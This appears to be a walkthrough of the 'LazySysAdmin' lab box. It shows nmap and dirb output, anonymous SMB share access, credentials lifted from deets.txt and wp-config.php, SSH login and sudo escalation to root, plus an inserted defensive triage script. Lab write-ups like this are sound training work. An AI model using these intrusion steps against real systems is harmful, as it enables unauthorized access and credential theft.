
Lab target 63

First look at the site's source code to find where the images are stored; one of them has an unusual file name, which base64-decodes as follows:

```
AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4
I$8b4f5a97-4757-4157-afe8-9a1a8
```

nmap

```
# divint3 @ Divint3 in ~ [21:49:41] C:130
$ nmap 172.17.135.63 -sV -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Nmap scan report for 172.17.135.63
Host is up (0.020s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds

# divint3 @ Divint3 in ~ [21:53:15]
$ nmap 172.17.135.63 -sV -Pn -A

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Nmap scan report for 172.17.135.63
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_ 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1.0
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 10.160.110.191
|_ error: Closing link: (nmap@10.160.110.191) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 40m48s, deviation: 0s, median: 40m48s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2019-05-28T00:34:48+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.90 seconds
```
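Added triage example (not from the original post): a small Python script that reads nmap -A text output like the scan above and turns the notable findings (guest SMB access, disabled message signing, exposed MySQL/IRC/SMB, paths advertised by robots.txt) into a defender's checklist. The sample text is a constructed, trimmed copy of the scan lines, and the RISKY_SERVICES policy and smb.conf remediation hints are assumptions for this lab host.

```python
import re

# Constructed sample: a trimmed copy of the port and script lines from the scan above.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| smb-security-mode:
| account_used: guest
| authentication_level: user
|_ message_signing: disabled (dangerous, but default)
"""

# Matches nmap port lines: "<port>/<proto> <state> <service> <version...>".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Assumed policy for this lab host: services that should not face the scanner's network.
RISKY_SERVICES = {
    "mysql": "database port reachable from the network; bind it to localhost",
    "irc": "IRC daemon exposed; confirm it is needed and firewall it",
    "netbios-ssn": "SMB exposed; review share permissions and guest access",
}


def parse_ports(text):
    """Return (port, proto, state, service, version) tuples for each port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5)))
    return ports


def findings(text):
    """Map the scan text to a list of defender-oriented findings."""
    out = []
    for port, proto, state, service, _version in parse_ports(text):
        if state == "open" and service in RISKY_SERVICES:
            out.append(f"{port}/{proto} {service}: {RISKY_SERVICES[service]}")
    if re.search(r"message_signing:\s*disabled", text):
        out.append("smb: message signing disabled; set 'server signing = mandatory' in smb.conf")
    if re.search(r"account_used:\s*guest", text):
        out.append("smb: guest account accepted; set 'map to guest = Never' in smb.conf")
    m = re.search(r"http-robots\.txt: (\d+) disallowed entries\n\|_(.*)", text)
    if m:
        out.append(f"http: robots.txt advertises {m.group(1)} hidden paths: {m.group(2).strip()}")
    return out
```

Running findings(SAMPLE_SCAN) yields six items for this host: three exposed services, the two SMB hardening gaps, and the robots.txt paths.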

Bring out dirb

```
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 27 21:38:27 2019
URL_BASE: http://172.17.135.63/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.17.135.63/ ----
==> DIRECTORY: http://172.17.135.63/apache/
+ http://172.17.135.63/index.html (CODE:200|SIZE:36072)
+ http://172.17.135.63/info.php (CODE:200|SIZE:77255)
==> DIRECTORY: http://172.17.135.63/javascript/
==> DIRECTORY: http://172.17.135.63/old/
==> DIRECTORY: http://172.17.135.63/phpmyadmin/
+ http://172.17.135.63/robots.txt (CODE:200|SIZE:92)
+ http://172.17.135.63/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://172.17.135.63/test/
==> DIRECTORY: http://172.17.135.63/wordpress/
==> DIRECTORY: http://172.17.135.63/wp/
```

Anonymous access to SMB

```
# divint3 @ Divint3 in ~ [22:46:26] 
$ smbclient -L 172.17.135.63
WARNING: The "syslog" option is deprecated
Enter divint3's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Server Comment
--------- -------
DESKTOP-IN4T2GV
LAZYSYSADMIN Web server

Workgroup Master
--------- -------
WORKGROUP DESKTOP-IN4T2GV


# divint3 @ Divint3 in ~ [22:20:32]
$ smbclient //172.17.135.63/share$

WARNING: The "syslog" option is deprecated
Enter divint3's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Tue Aug 15 19:21:08 2017
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017

3029776 blocks of size 1024. 1237820 blocks available
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (5.0 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \>
smb: \> cd wordpress
smb: \wordpress\> ls
. D 0 Tue Aug 15 19:21:08 2017
.. D 0 Tue Aug 15 19:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 17:58:26 2015
wp-trackback.php N 4513 Sat Oct 15 03:39:28 2016
wp-admin D 0 Thu Aug 3 05:02:02 2017
wp-settings.php N 16200 Fri Apr 7 02:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 19:20:28 2015
index.php N 418 Wed Sep 25 08:18:11 2013
wp-cron.php N 3286 Mon May 25 01:26:25 2015
wp-links-opml.php N 2422 Mon Nov 21 10:46:30 2016
readme.html N 7413 Mon Dec 12 16:01:39 2016
wp-signup.php N 29924 Tue Jan 24 19:08:42 2017
wp-content D 0 Mon Aug 21 18:07:27 2017
license.txt N 19935 Tue Jan 3 01:58:42 2017
wp-mail.php N 8048 Wed Jan 11 13:13:43 2017
wp-activate.php N 5447 Wed Sep 28 05:36:28 2016
.htaccess H 35 Tue Aug 15 19:40:13 2017
xmlrpc.php N 3065 Thu Sep 1 00:31:29 2016
wp-login.php N 34327 Sat May 13 01:12:46 2017
wp-load.php N 3301 Tue Oct 25 11:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 20:00:32 2016
wp-config.php N 3703 Mon Aug 21 17:25:14 2017
wp-includes D 0 Thu Aug 3 05:02:03 2017

3029776 blocks of size 1024. 1237744 blocks available
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (452.0 KiloBytes/sec) (average 452.0 KiloBytes/sec)
smb: \wordpress\>
```

deets.txt

```
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
```

todolist.txt

```
Prevent users from being able to view to web root using the local file browser
```

wp-config.php holds the database configuration, so download it:

```php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/

define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
```

Visiting http://172.17.135.63/wordpress/ gives a hint: "my name is togie."

SSH in with ssh togie@172.17.135.63, password 12345

```
togie@LazySysAdmin:~$ cd 
-rbash: cd: restricted
```
Switch to bash.

Escalate to root with sudo -s

```
togie@LazySysAdmin:~$ sudo -s
[sudo] password for togie:
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
```

Root still lands in rbash by default (sudo -s starts the shell named by the invoking user's SHELL variable, so togie's restricted shell is inherited), so switch to bash again. /etc/passwd lists root's shell as bash, yet cd is still refused.

```
root@LazySysAdmin:/root# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
```

Time to eat, time to eat.